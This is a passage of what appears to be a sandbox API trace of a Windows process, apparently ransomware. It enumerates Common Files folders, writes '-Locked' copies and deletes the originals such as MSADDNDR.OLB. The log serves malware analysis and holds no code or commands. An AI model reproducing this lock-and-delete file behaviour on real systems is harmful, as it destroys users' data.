[0299.521] CloseHandle (hObject=0x49c) returned 1 [0299.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af19c) returned 1 [0299.522] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files", nBufferLength=0x105, lpBuffer=0x1aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files", lpFilePart=0x0) returned 0x23 [0299.522] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x0) returned 0x24 [0299.522] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*", lpFindFileData=0x1aeec4 | out: lpFindFileData=0x1aeec4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x329e4cb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32eb7738, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.525] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x329e4cb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32eb7738, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.525] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1c9d90, ftCreationTime.dwHighDateTime=0x1d7d4d9, ftLastAccessTime.dwLowDateTime=0x584d6b30, ftLastAccessTime.dwHighDateTime=0x1d7e370, ftLastWriteTime.dwLowDateTime=0x584d6b30, ftLastWriteTime.dwHighDateTime=0x1d7e370, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0299.525] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329e4cb6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329e4cb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ea2abe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-charge.exe-Locked", cAlternateFileName="ACTIVE~2.EXE")) returned 1 [0299.526] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32eada95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32eada95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32eada95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-charge.exe-Locked-Locked", cAlternateFileName="ACTIVE~3.EXE")) returned 1 [0299.526] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0299.527] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0299.527] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1dbc800, ftCreationTime.dwHighDateTime=0x1d770a5, ftLastAccessTime.dwLowDateTime=0xb9f5fd00, ftLastAccessTime.dwHighDateTime=0x1d7df76, ftLastWriteTime.dwLowDateTime=0xb9f5fd00, ftLastWriteTime.dwHighDateTime=0x1d7df76, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oh pain.exe", cAlternateFileName="OHPAIN~1.EXE")) returned 1 [0299.527] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32eb7738, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32eb7738, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32eb7738, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oh pain.exe-Locked", cAlternateFileName="OHPAIN~2.EXE")) returned 1 [0299.528] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0299.528] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0299.528] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.528] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0299.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af168) returned 1 [0299.529] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x2c [0299.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.529] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x2c [0299.530] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x2d [0299.530] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.532] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.533] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8db7800, ftCreationTime.dwHighDateTime=0x1d0d7cc, ftLastAccessTime.dwLowDateTime=0x5549a78f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa8db7800, ftLastWriteTime.dwHighDateTime=0x1d0d7cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 1 [0299.533] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.533] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.533] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x2c [0299.534] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x2d [0299.534] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.534] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.535] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8db7800, ftCreationTime.dwHighDateTime=0x1d0d7cc, ftLastAccessTime.dwLowDateTime=0x5549a78f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa8db7800, ftLastWriteTime.dwHighDateTime=0x1d0d7cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 1 [0299.535] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8db7800, ftCreationTime.dwHighDateTime=0x1d0d7cc, ftLastAccessTime.dwLowDateTime=0x5549a78f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa8db7800, ftLastWriteTime.dwHighDateTime=0x1d0d7cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 0 [0299.535] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.536] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\MSADDNDR.OLB-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\DESIGNER\\MSADDNDR.OLB-Locked", lpFilePart=0x0) returned 0x40 [0299.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.536] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\MSADDNDR.OLB-Locked" (normalized: "c:\\program files (x86)\\common files\\designer\\msaddndr.olb-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.537] GetFileType (hFile=0x49c) returned 0x1 [0299.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.537] GetFileType (hFile=0x49c) returned 0x1 [0299.539] CloseHandle (hObject=0x49c) returned 1 [0299.540] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\MSADDNDR.OLB", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\DESIGNER\\MSADDNDR.OLB", lpFilePart=0x0) returned 0x39 [0299.540] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files (x86)\\common files\\designer\\msaddndr.olb")) returned 1 [0299.542] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x34 [0299.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.542] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x34 [0299.543] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x35 [0299.543] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32df615, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x32df615, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DAO", cAlternateFileName="")) returned 1 [0299.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6ec61aae, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec61aae, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ink", cAlternateFileName="")) returned 1 [0299.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x550eae0c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x550eae0c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x550eae0c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSEnv", cAlternateFileName="")) returned 1 [0299.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0299.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f6d7c91, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x6f8d7365, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6f8d7365, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0299.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f65c7f6, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x6f65c7f6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6f65c7f6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0299.546] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5557162e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0299.546] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0299.546] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0299.547] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0299.547] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x6e37d73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x8cfdaf35, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x8cfdaf35, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0299.547] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0299.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x550c4c74, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x5567f2c8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5567f2c8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0299.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5509eb42, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55677c77, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55677c77, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0299.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5509eb42, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55677c77, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55677c77, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 0 [0299.549] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.549] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x34 [0299.549] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x35 [0299.549] FindFirstFileW (in: lpFileName="C:\\Program Files 